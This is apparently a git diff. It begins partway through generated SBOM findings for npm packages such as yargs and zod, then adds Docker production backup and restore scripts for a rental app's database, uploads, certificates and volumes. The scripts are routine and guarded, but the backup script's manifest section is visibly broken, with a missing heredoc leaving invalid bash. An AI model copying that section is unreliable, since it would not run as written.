id: c85ae4ebdc6284ae + name: yallist + version: 4.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/yallist@4.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz + integrity: sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 71c51c3c7b12c140 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yargs 15.4.1' + title: yargs 15.4.1 + description: 'Package discovered: yargs 15.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bbb181fdab2eb6da + name: yargs + version: 15.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/yargs@15.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz + integrity: sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A== + dependencies: + cliui: ^6.0.0 + decamelize: ^1.2.0 + find-up: ^4.1.0 + get-caller-file: ^2.0.1 + require-directory: ^2.1.1 + require-main-filename: ^2.0.0 + set-blocking: ^2.0.0 + string-width: ^4.2.0 + which-module: ^2.0.0 + y18n: ^4.0.0 + yargs-parser: ^18.1.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 96fe97c2b6d8795a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yargs 17.7.2' + title: yargs 17.7.2 + description: 'Package discovered: yargs 17.7.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c2726c8cb18290f2 + name: yargs + version: 17.7.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/yargs@17.7.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz + integrity: sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w== + dependencies: + cliui: ^8.0.1 + escalade: ^3.1.1 + get-caller-file: ^2.0.5 + require-directory: ^2.1.1 + string-width: ^4.2.3 + y18n: ^5.0.5 + yargs-parser: ^21.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ee09b685d8bedc8a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yargs-parser 18.1.3' + title: yargs-parser 18.1.3 + description: 'Package discovered: yargs-parser 18.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 385fd2e9c795bcc7 + name: yargs-parser + version: 18.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/yargs-parser@18.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz + integrity: sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ== + dependencies: + camelcase: ^5.0.0 + decamelize: ^1.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a4ff6cebec5b0be4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yargs-parser 21.1.1' + title: yargs-parser 21.1.1 + description: 'Package discovered: yargs-parser 21.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 95c25d265eed6eaf + name: yargs-parser + version: 21.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/yargs-parser@21.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz + integrity: sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 14bd34194369a5c5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yocto-queue 0.1.0' + title: yocto-queue 0.1.0 + description: 'Package discovered: yocto-queue 0.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 813268dedfe3539f + name: yocto-queue + version: 0.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/yocto-queue@0.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz + integrity: sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 16bb4d5a9e7dc8d3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yoga-layout 2.0.1' + title: yoga-layout 2.0.1 + description: 'Package discovered: yoga-layout 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 579e04e050802ec1 + name: yoga-layout + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/yoga-layout@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz + integrity: sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6ac3ad6fac7a8b51 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: zod 3.25.76' + title: zod 3.25.76 + description: 'Package discovered: zod 3.25.76' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c30d59c73bdda635 + name: zod + version: 3.25.76 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/zod@3.25.76 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/zod/-/zod-3.25.76.tgz + integrity: sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 diff --git a/scripts/docker-prod-backup.sh b/scripts/docker-prod-backup.sh new file mode 100644 index 0000000..91cff45 --- /dev/null +++ b/scripts/docker-prod-backup.sh @@ -0,0 +1,100 @@ +#!/usr/bin/env bash + +set -euo pipefail + +ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)" +source "${ROOT_DIR}/scripts/docker-prod-common.sh" + +BACKUP_ROOT="${1:-${ROOT_DIR}/backups}" +shift || true +EXTRA_VOLUMES=("$@") +TIMESTAMP="$(date -u +"%Y%m%dT%H%M%SZ")" +mkdir -p "${BACKUP_ROOT}" +BACKUP_ROOT="$(cd "${BACKUP_ROOT}" && pwd)" +BACKUP_DIR="${BACKUP_ROOT}/rentaldrivego-prod-${TIMESTAMP}" +VOLUME_BACKUP_DIR="${BACKUP_DIR}/volumes" + +DEFAULT_VOLUMES=( + "${PROJECT_NAME}_api_uploads" + "${PROJECT_NAME}_pgmanage_prod_data" + "${PROJECT_NAME}_postgres_prod_data" + "${PROJECT_NAME}_redis_prod_data" +) + +mkdir -p "${BACKUP_DIR}" +mkdir -p "${VOLUME_BACKUP_DIR}" + +ensure_env_file +ensure_traefik_network + +echo "Creating production backup in ${BACKUP_DIR}" + +prod_compose up -d postgres >/dev/null + +echo "Backing up PostgreSQL database..." +prod_compose exec -T postgres sh -lc 'pg_dump -U "$POSTGRES_USER" -d "$POSTGRES_DB" -Fc' > "${BACKUP_DIR}/postgres.dump" + +echo "Backing up uploaded files..." +prod_compose run --rm --no-deps api bash -lc ' + mkdir -p /var/lib/rentaldrivego/storage + tar -czf - -C /var/lib/rentaldrivego/storage . +' > "${BACKUP_DIR}/api-uploads.tar.gz" + +echo "Backing up Traefik certificates..." +if traefik_compose run --rm traefik sh -lc 'test -d /letsencrypt' > /dev/null 2>&1; then + traefik_compose run --rm traefik sh -lc ' + mkdir -p /letsencrypt + tar -czf - -C /letsencrypt . + ' > "${BACKUP_DIR}/traefik-letsencrypt.tar.gz" +else + echo "Skipping Traefik certificate backup; Traefik runtime is not available." +fi + +declare -a ALL_VOLUMES=("${DEFAULT_VOLUMES[@]}") + +if [[ -n "${DOCKER_EXTRA_BACKUP_VOLUMES:-}" ]]; then + # shellcheck disable=SC2206 + ALL_VOLUMES+=(${DOCKER_EXTRA_BACKUP_VOLUMES}) +fi + +if [[ "${#EXTRA_VOLUMES[@]}" -gt 0 ]]; then + ALL_VOLUMES+=("${EXTRA_VOLUMES[@]}") +fi + +echo "Backing up named Docker volumes..." +declare -A seen_volumes=() +for volume_name in "${ALL_VOLUMES[@]}"; do + [[ -n "${volume_name}" ]] || continue + if [[ -n "${seen_volumes[${volume_name}]:-}" ]]; then + continue + fi + seen_volumes["${volume_name}"]=1 + + if ! docker_volume_exists "${volume_name}"; then + echo "Skipping missing volume: ${volume_name}" + continue + fi + + echo " - ${volume_name}" + backup_named_volume "${volume_name}" "${VOLUME_BACKUP_DIR}/${volume_name}.tar.gz" +done + +cat > "${BACKUP_DIR}/manifest.txt" < /dev/null; then + echo " - ${VOLUME_BACKUP_DIR}/*.tar.gz" +fi +echo " - ${BACKUP_DIR}/manifest.txt" diff --git a/scripts/docker-prod-common.sh b/scripts/docker-prod-common.sh index 97c26c0..6a26879 100755 --- a/scripts/docker-prod-common.sh +++ b/scripts/docker-prod-common.sh @@ -8,6 +8,7 @@ TRAEFIK_COMPOSE_FILE="${ROOT_DIR}/traefik.yaml" ENV_FILE="${ROOT_DIR}/.env.docker.production" PROJECT_NAME="${DOCKER_PROD_PROJECT_NAME:-rentaldrivego-prod}" TRAEFIK_NETWORK="${DOCKER_PROD_TRAEFIK_NETWORK:-traefik-proxy}" +VOLUME_BACKUP_IMAGE="${DOCKER_VOLUME_BACKUP_IMAGE:-postgres:16-alpine}" ensure_env_file() { if [[ ! -f "${ENV_FILE}" ]]; then @@ -29,7 +30,7 @@ prod_compose() { } traefik_compose() { - docker compose -f "${TRAEFIK_COMPOSE_FILE}" "$@" + docker compose --env-file "${ENV_FILE}" -f "${TRAEFIK_COMPOSE_FILE}" "$@" } start_prod_services() { @@ -42,3 +43,47 @@ start_traefik() { ensure_traefik_network traefik_compose up -d } + +stop_traefik() { + ensure_env_file + traefik_compose down >/dev/null 2>&1 || true +} + +docker_volume_exists() { + docker volume inspect "$1" >/dev/null 2>&1 +} + +backup_named_volume() { + local volume_name="$1" + local archive_path="$2" + + docker run --rm \ + -v "${volume_name}:/volume:ro" \ + -v "$(dirname "${archive_path}"):/backup" \ + "${VOLUME_BACKUP_IMAGE}" \ + sh -lc "tar -czf /backup/$(basename "${archive_path}") -C /volume ." +} + +volume_running_containers() { + docker ps --filter "volume=$1" --format '{{.Names}}' +} + +restore_named_volume() { + local volume_name="$1" + local archive_path="$2" + local running + + running="$(volume_running_containers "${volume_name}")" + if [[ -n "${running}" ]]; then + echo "Volume ${volume_name} is currently used by running containers:" >&2 + echo "${running}" >&2 + echo "Stop those containers before restoring this volume." >&2 + exit 1 + fi + + docker run --rm \ + -v "${volume_name}:/volume" \ + -v "$(dirname "${archive_path}"):/backup" \ + "${VOLUME_BACKUP_IMAGE}" \ + sh -lc "find /volume -mindepth 1 -delete && tar -xzf /backup/$(basename "${archive_path}") -C /volume" +} diff --git a/scripts/docker-prod-restore.sh b/scripts/docker-prod-restore.sh new file mode 100644 index 0000000..c439a30 --- /dev/null +++ b/scripts/docker-prod-restore.sh @@ -0,0 +1,114 @@ +#!/usr/bin/env bash + +set -euo pipefail + +ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)" +source "${ROOT_DIR}/scripts/docker-prod-common.sh" + +BACKUP_DIR="${1:-}" +CONFIRM_FLAG="${2:-}" + +if [[ -z "${BACKUP_DIR}" ]]; then + echo "Usage: bash scripts/docker-prod-restore.sh --yes" >&2 + exit 1 +fi + +if [[ "${CONFIRM_FLAG}" != "--yes" ]]; then + echo "Restore is destructive and will overwrite the production database and uploaded files." >&2 + echo "Re-run with: bash scripts/docker-prod-restore.sh ${BACKUP_DIR} --yes" >&2 + exit 1 +fi + +if [[ ! -d "${BACKUP_DIR}" ]]; then + echo "Backup directory not found: ${BACKUP_DIR}" >&2 + exit 1 +fi + +if [[ ! -f "${BACKUP_DIR}/postgres.dump" ]]; then + echo "Missing database backup: ${BACKUP_DIR}/postgres.dump" >&2 + exit 1 +fi + +if [[ ! -f "${BACKUP_DIR}/api-uploads.tar.gz" ]]; then + echo "Missing uploads backup: ${BACKUP_DIR}/api-uploads.tar.gz" >&2 + exit 1 +fi + +ensure_env_file +ensure_traefik_network + +RAW_VOLUME_DIR="${BACKUP_DIR}/volumes" +SKIP_RAW_RESTORE_VOLUMES=( + "${PROJECT_NAME}_api_uploads" + "${PROJECT_NAME}_postgres_prod_data" +) + +echo "Stopping application services before restore..." +prod_compose stop api marketplace dashboard admin pgmanage >/dev/null || true +prod_compose stop redis >/dev/null || true +stop_traefik + +echo "Ensuring PostgreSQL is running..." +prod_compose up -d postgres >/dev/null + +echo "Waiting for PostgreSQL..." +until prod_compose exec -T postgres sh -lc 'pg_isready -U "$POSTGRES_USER" -d "$POSTGRES_DB"' >/dev/null 2>&1; do + sleep 2 +done + +echo "Restoring PostgreSQL database..." +cat "${BACKUP_DIR}/postgres.dump" | prod_compose exec -T postgres sh -lc ' + pg_restore -U "$POSTGRES_USER" -d "$POSTGRES_DB" --clean --if-exists --no-owner --no-privileges +' + +echo "Restoring uploaded files..." +cat "${BACKUP_DIR}/api-uploads.tar.gz" | prod_compose run --rm --no-deps api bash -lc ' + mkdir -p /var/lib/rentaldrivego/storage + find /var/lib/rentaldrivego/storage -mindepth 1 -delete + tar -xzf - -C /var/lib/rentaldrivego/storage +' + +if [[ -f "${BACKUP_DIR}/traefik-letsencrypt.tar.gz" ]]; then + echo "Restoring Traefik certificates..." + cat "${BACKUP_DIR}/traefik-letsencrypt.tar.gz" | traefik_compose run --rm traefik sh -lc ' + mkdir -p /letsencrypt + find /letsencrypt -mindepth 1 -delete + tar -xzf - -C /letsencrypt + chmod 600 /letsencrypt/acme.json 2>/dev/null || true + ' +fi + +if [[ -d "${RAW_VOLUME_DIR}" ]]; then + echo "Restoring raw Docker volume archives..." + for archive_path in "${RAW_VOLUME_DIR}"/*.tar.gz; do + [[ -e "${archive_path}" ]] || continue + volume_name="$(basename "${archive_path}" .tar.gz)" + + skip_volume=false + for managed_volume in "${SKIP_RAW_RESTORE_VOLUMES[@]}"; do + if [[ "${volume_name}" == "${managed_volume}" ]]; then + skip_volume=true + break + fi + done + + if [[ "${skip_volume}" == true ]]; then + echo "Skipping raw restore for ${volume_name}; handled by service-aware restore." + continue + fi + + if ! docker_volume_exists "${volume_name}"; then + echo "Creating missing volume ${volume_name}" + docker volume create "${volume_name}" >/dev/null + fi + + echo " - ${volume_name}" + restore_named_volume "${volume_name}" "${archive_path}" + done +fi + +echo "Starting production services..." +start_traefik +start_prod_services + +echo "Restore complete from ${BACKUP_DIR}"